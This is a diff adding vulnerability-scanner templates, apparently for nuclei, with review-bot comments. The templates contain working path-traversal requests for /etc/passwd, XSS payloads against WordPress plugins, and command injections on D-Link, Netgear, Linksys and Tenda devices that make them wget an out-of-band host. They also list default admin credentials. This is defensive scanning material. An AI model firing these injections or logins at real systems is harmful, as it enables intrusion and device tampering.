||||||
|
info:
|
||||||
|
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
||||||
|
- https://www.exploit-db.com/exploits/48614
|
||||||
|
tags: cve,cve2018,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
|
||||||
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[0*]:0:0"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
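Review bot: The regex `root:[0*]:0:0` matches only `root:0:0:0` or `root:*:0:0`; the usual Linux /etc/passwd entry is `root:x:0:0`, which this pattern rejects, so the passwd probe on the first `path:` can never match and only the win.ini alternative can fire. CVE-2009-1558 in the same commit uses `root:[x*]:0:0`; using the same expression here, `- "root:[x*]:0:0"`, keeps the two consistent and makes the Linux branch effective. The `reference: |` block scalar here likewise yields one string rather than a list of URLs.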
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-20462
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-5316
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2019-12616
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: phpMyAdmin CSRF
|
||||||
|
author: Mohammedsaneem
|
||||||
|
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
|
||||||
|
severity: medium
|
||||||
|
tags: cve,cve2019,phpmyadmin,csrf
|
||||||
|
reference: |
|
||||||
|
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
||||||
|
- https://www.exploit-db.com/exploits/46982
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/phpmyadmin/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "4.6.6deb4+deb9u2"
|
||||||
|
- "phpMyAdmin"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
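Review bot: The word matcher pins a single Debian package build, `4.6.6deb4+deb9u2`, so the template is a fingerprint of one packaging of phpMyAdmin rather than a test of the CSRF described in `description`, and any other build in the affected range is silently missed. `name: phpMyAdmin CSRF` and the description read as if the flaw were verified; a name such as `phpMyAdmin 4.6.6deb4+deb9u2 (Debian) - Version Detection for CVE-2019-12616` would state what the match actually proves. The hard-coded `/phpmyadmin/` path likewise covers only the default Debian alias and deserves a mention in the description.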
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2019-15713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/9267
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<svg/onload=confirm(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2019-16332
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2019-16525
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: CVE-2019-20085
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TVT NVMS 1000 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
||||||
|
reference: |
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
||||||
|
- https://www.exploit-db.com/exploits/48311
|
||||||
|
tags: cve,cve2019,iot,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
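Review bot: The traversal in the `path` entry relies on the literal `/../../` segments reaching the server unchanged; if the HTTP client or an intermediary (proxy, WAF) collapses dot-segments, the probe degrades to a harmless `GET /Windows/win.ini` and the template silently never matches. The exploit-db PoC sends the unnormalised request line, and nuclei templates that depend on raw dot-segments usually express the request as a `raw:` block with `unsafe: true` so the request-target is transmitted verbatim. Consider converting to that form, or at least verify with a packet capture that the segments are sent as written. The `\[(font|extension|file)s\]` regex is a reasonable `win.ini` signature.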
|
|
@ -18,7 +18,9 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<img src=x onerror=alert(123);>"
|
- "<img src=x onerror=alert(123);>"
|
||||||
|
- "catch-breadcrumb"
|
||||||
part: body
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -20,6 +20,11 @@ requests:
|
||||||
- "<img src onerror=alert(123)>"
|
- "<img src onerror=alert(123)>"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "nova-lite"
|
||||||
|
part: body
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2020-25506
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||||
|
reference: |
|
||||||
|
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
|
||||||
|
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||||
|
tags: cve,cve2020,dlink,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
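Review bot: The second raw request embeds `wget http://{{interactsh-url}}` unencoded in the request line, so the space after `wget` terminates the request-target and the server sees `http://...` where the HTTP version belongs; most servers reject or truncate such a line before the CGI ever sees `f_ntp_server`. Percent-encode the query instead: `POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=%60wget%20http://{{interactsh-url}}%60 HTTP/1.1`. The first request's form body would also benefit from an explicit `Content-Type: application/x-www-form-urlencoded`, since whether the CGI parses an unlabelled body is not established by the references. Both requests execute a command (an outbound `wget`) on the device, so this is not a passive check and `description` should say so.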
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2020-26919
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
|
||||||
|
reference: |
|
||||||
|
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
|
||||||
|
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||||
|
tags: cve,cve2020,netgear,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /login.htm HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
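Review bot: The POST body `submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=` is sent without a `Content-Type: application/x-www-form-urlencoded` header; nothing in the cited advisory excerpt shows that the switch parses form data without it, so adding the header is the safer choice. The `description` should state that a hit means a shell command (`wget`) was executed on the switch, so operators understand the template is active rather than a fingerprint. Otherwise the single `interactsh_protocol` matcher is appropriate for an OOB confirmation.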
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2020-35713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Linksys RE6500 Pre-Auth RCE
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
|
||||||
|
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
|
||||||
|
tags: cve,cve2020,linksys,rce,oob,router
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /goform/setSysAdm HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Connection: keep-alive
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}/login.shtml
|
||||||
|
|
||||||
|
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
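Review bot: The POST to `/goform/setSysAdm` carries `admuser=admin&admpass=;wget ...;&admpasshint=...&AuthTimeout=600&wirelessMgmt_http=1`, which by the description's own wording ("execute arbitrary commands or set a new password") is the administrator-settings form; if the handler applies these fields as well as executing the injection, a scan overwrites the admin password and management settings on every affected extender it touches. That side effect should be stated in `description` (and the fields not needed to trigger the injection dropped from the body) so operators can opt out. `Connection: keep-alive` should also be `Connection: close`, matching the other raw templates in this commit.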
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2021-31755
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Tenda Router AC11 RCE
|
||||||
|
description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
reference: |
|
||||||
|
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
|
||||||
|
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||||
|
tags: cve,cve2021,tenda,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /goform/setmac HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}/index.htmlr
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
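Review bot: The body posted to `/goform/setmac` is a complete wireless configuration (`wifiSSID=Tenda_B0E040`, `wifiPwd=Password12345`, `wpsEn=true`, `wanType=static`, ...) with the injection only in `mac=`; if the handler applies the form before or after running the injected command, a scan resets the target's SSID, Wi-Fi password, WPS state and WAN mode to these fixed values. Trim the request to the minimum parameters the reference PoC needs and document the destructive side effect in `description`. Two typos as well: `enda Router AC11` should be `Tenda Router AC11`, and the `Referer` ends in `index.htmlr`.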
|
|
@ -0,0 +1,67 @@
|
||||||
|
id: adobe-aem-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe AEM Default Credentials
|
||||||
|
author: random-robbie
|
||||||
|
severity: critical
|
||||||
|
tags: aem,default-login
|
||||||
|
reference:
|
||||||
|
|
||||||
|
requests:
|
||||||
|
|
||||||
|
- payloads:
|
||||||
|
|
||||||
|
rr_username:
|
||||||
|
- admin
|
||||||
|
- grios
|
||||||
|
- replication-receiver
|
||||||
|
- vgnadmin
|
||||||
|
- aparker@geometrixx.info
|
||||||
|
- jdoe@geometrixx.info
|
||||||
|
- james.devore@spambob.com
|
||||||
|
- matt.monroe@mailinator.com
|
||||||
|
- aaron.mcdonald@mailinator.com
|
||||||
|
- jason.werner@dodgit.com
|
||||||
|
|
||||||
|
rr_password:
|
||||||
|
- admin
|
||||||
|
- password
|
||||||
|
- replication-receiver
|
||||||
|
- vgnadmin
|
||||||
|
- aparker
|
||||||
|
- jdoe
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
|
||||||
|
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||||
|
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||||
|
Accept: text/plain, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 67
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Referer: {{BaseURL}}/libs/granite/core/content/login.html
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- login-token
|
||||||
|
- crx.default
|
||||||
|
condition: and
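Review bot: `Content-Length: 67` is hard-coded while the body length changes with every `{{rr_username}}`/`{{rr_password}}` pair — the first pair (`admin`/`admin`) is already 65 bytes and the `replication-receiver` pair is far longer; the client recomputes the length for non-`unsafe` raw requests, but the stale value is misleading and would truncate the body the moment someone adds `unsafe: true`, so delete that header line. `reference:` is empty and therefore parses as `null`; remove the key or point it at documentation of the sample/Geometrixx accounts being tried. Since `attack: pitchfork` pairs the two lists positionally, a one-line comment above `attack:` saying so would stop a later edit that appends to only one list from silently desynchronising the pairs.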
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: dell-emc-ecom-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Dell EMC ECOM Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
|
||||||
|
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
|
||||||
|
tags: dell,emc,ecom,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: ECOMSecurity"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Welcome to ECOM"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
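Review bot: The `reference` is a ViPR Controller knowledge-base article about array privileges; it does not document `admin:#1Password` as an ECOM default, so a reader cannot verify the claim in `description` from it — link the ECOM/SMI-S provider documentation that states the default, or say in `description` where the value comes from. The login is attempted against the `{{BaseURL}}` root; if the `Welcome to ECOM` banner is also served to unauthenticated clients, only the `ECOMSecurity` cookie distinguishes success, so its absence on failed logins should be confirmed on a real instance. Minor: give the `Welcome to ECOM` matcher an explicit `part: body` for symmetry with the header matcher.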
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: hortonworks-smartsense-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HortonWorks SmartSense Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on HortonWorks SmartSense application.
|
||||||
|
reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
|
||||||
|
tags: hortonworks,smartsense,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/apt/v1/context'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46YWRtaW4=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: SUPPORTSESSIONID"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "smartsenseId"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
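Review bot: The probe path `/apt/v1/context` looks like a typo for `/api/v1/context`; if it is, the template can never match, so please confirm the endpoint against the referenced Cloudera documentation before merging. The `smartsenseId` word has no `part:` and so defaults to the body, which is presumably intended — stating `part: body` explicitly keeps it consistent with the header matcher above it.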
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: idemia-biometrics-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IDEMIA BIOMetrics Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of password=12345 on IDEMIA BIOMetrics application.
|
||||||
|
reference: https://www.google.com/search?q=idemia+password%3D+"12345"
|
||||||
|
tags: idemia,biometrics,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/cgi-bin/login.cgi'
|
||||||
|
|
||||||
|
body: password=12345
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "session_id="
|
||||||
|
- "resource"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Invalid Password"
|
||||||
|
part: body
|
||||||
|
negative: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
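Review bot: The `reference` is a Google search URL, which is not a verifiable source for the `12345` default; replace it with the vendor documentation or advisory that states the default, or drop the key rather than cite a search engine. The POST sends `body: password=12345` with no `Content-Type` header and, as far as I can tell, nuclei does not add one for `body:` requests, so add `headers: Content-Type: application/x-www-form-urlencoded` unless the device is known to parse unlabelled bodies. The `session_id=`/`resource` pair has no `part:` and therefore matches the body; saying `part: body` explicitly keeps it consistent with the negative matcher below it.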
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: panos-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Palo Alto Networks PAN-OS Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application.
|
||||||
|
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
|
||||||
|
tags: paloalto,panos,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/php/login.php'
|
||||||
|
|
||||||
|
body: user=admin&passwd=admin&challengePwd=&ok=Login
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: PHPSESSID"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Warning: Your device is still configured with the default admin"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
